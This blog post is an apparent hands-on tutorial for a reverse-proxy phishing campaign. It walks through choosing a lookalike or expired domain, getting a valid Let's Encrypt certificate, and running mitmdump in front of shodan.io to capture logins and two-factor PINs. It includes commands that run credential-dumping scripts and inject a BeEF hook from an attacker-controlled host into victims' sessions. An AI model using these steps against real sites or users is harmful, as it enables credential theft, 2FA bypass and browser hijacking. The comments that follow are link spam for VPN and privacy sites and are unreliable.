Thursday, March 30, 2017

Reverse proxy phishing with valid certificates

Introduction

This is going to be a quick down and dirty post on how to effectively create cloned websites on the fly by using mitmdump and letsencrypt for valid certificates. We'll use a reverse proxy in front of a site in order to create very convincing and advanced phishing campaign. This is a great way to capture two factor authentication pins and attempt automatic VPN logins.

Acquire a domain

There are plenty of different approaches when it comes to acquiring a domain for your phish. Ideally, you will want it to be very similar to your target. Alternative TLDs are an easy way to make convincing phishing attacks. You may also look into recently expired domains that can be acquired. For this tutorial, I'm going to set up blog.chokepoint.net instead of purchasing a domain for demonstration sake, and demonstrate a phish by setting up a reverse proxy for shodan.io.

CatMyFish is an excellent tool that relies on expireddomains.net in order to find potential expired domains.

Lets Encrypt!

Let's encrypt is a free, automated, and open CA that's available to anyone that owns a domain or subdomain. They have done a lot of work in helping to create secure connections for millions of websites. While they provide a great and legitimate service, it's often abused by criminals and red teams as well. Certbot is a cross platform tool for validating that you do indeed own a domain prior to issuing any certificates.

Download certbot

$ wget https://dl.eff.org/certbot-auto
$ chmod a+x certbot-auto
$ ./certbot-auto

Now simply run the following command, and choose "Spin up a temporary webserver (standalone)"

$ ./certbot-auto certonly

Follow the prompts for your e-mail address and domain as appropriate. Your certificates will be placed in /etc/letsencrypt/live/site.domain.here. In order to prepare the certificates for use with out reverse proxy MITM attack, simply concatenate the private key and fullchain certificates into one file.

$ sudo cat /etc/letsencrypt/live/blog.chokepoint.net/privkey.pem /etc/letsencrypt/live/blog.chokepoint.net/fullchain.pem > blog.chokepoint.net.pem

Download latest mitmproxy

Mitmproxy recently went through some large upgrade that may not have made it into your distribution's repository list yet. We'll go ahead and grab 0.18.2 using pip, as some features regarding the certificates seem to be broken in 2.* versions.

$ sudo apt-get install python3-dev python3-pip libffi-dev libssl-dev
$ sudo pip3 install mitmproxy==0.18.2

Execute reverse proxy attack

$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log
Notice how the URL bar has the green Secure logo and all.

Going Beyond

Here are two scripts that will help in dumping credentials as well as an example script for injecting BEEF hooks into sessions passing through the MITM.

Dumping credentials

Beef injection

Running scripts

In order to execute scripts, use the -s option in mitmdump. For example:
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -s ./dump_creds.py -w blog.log
$ sudo mitmdump -R https://www.shodan.io -p 443 --no-upstream-cert --cert blog.chokepoint.pem -w blog.log -s "beef_injector.py http://beef.chokepoint.net:3000/hook.js"

10 comments:

  1. Thanks so much with this fantastic new web site. I�m very fired up to show it to anyone. It makes me so satisfied your vast understanding and wisdom have a new channel for trying into the world. click here

    ReplyDelete
  2. I know your aptitude on this. I should say we ought to have an online discourse on this. Composing just remarks will close the talk straight away! What's more, will confine the advantages from this data.  privacy online

    ReplyDelete
  3. Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you https://getmoreprivacy.com/

    ReplyDelete
  4. This is really great work. Thank you for sharing such a good and useful information here in the blog for students.  lemigliorivpn.com

    ReplyDelete
  5. just what most individuals' desire. However, most of which have no idea of the inner thoughts and multi-step means of purchasing a fresh home privacyonline.com.br

    ReplyDelete
  6. This is an incredible rousing article.I am basically satisfied with your great work.You put truly exceptionally accommodating data...  https://privacyenbescherming.nl

    ReplyDelete
  7. I definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. privatnostonline

    ReplyDelete
  8. It is imperative that we read blog post very carefully. I am already done it and find that this post is really amazing. https://internetprivatsphare.ch

    ReplyDelete
  9. A debt of gratitude is in order for the significant data and experiences you have so given here... les meilleurs vpn

    ReplyDelete
  10. This is only the data I am discovering all over the place. A debt of gratitude is in order for your website, I simply subscribe your online journal. This is a decent blog.. vpn netflix

    ReplyDelete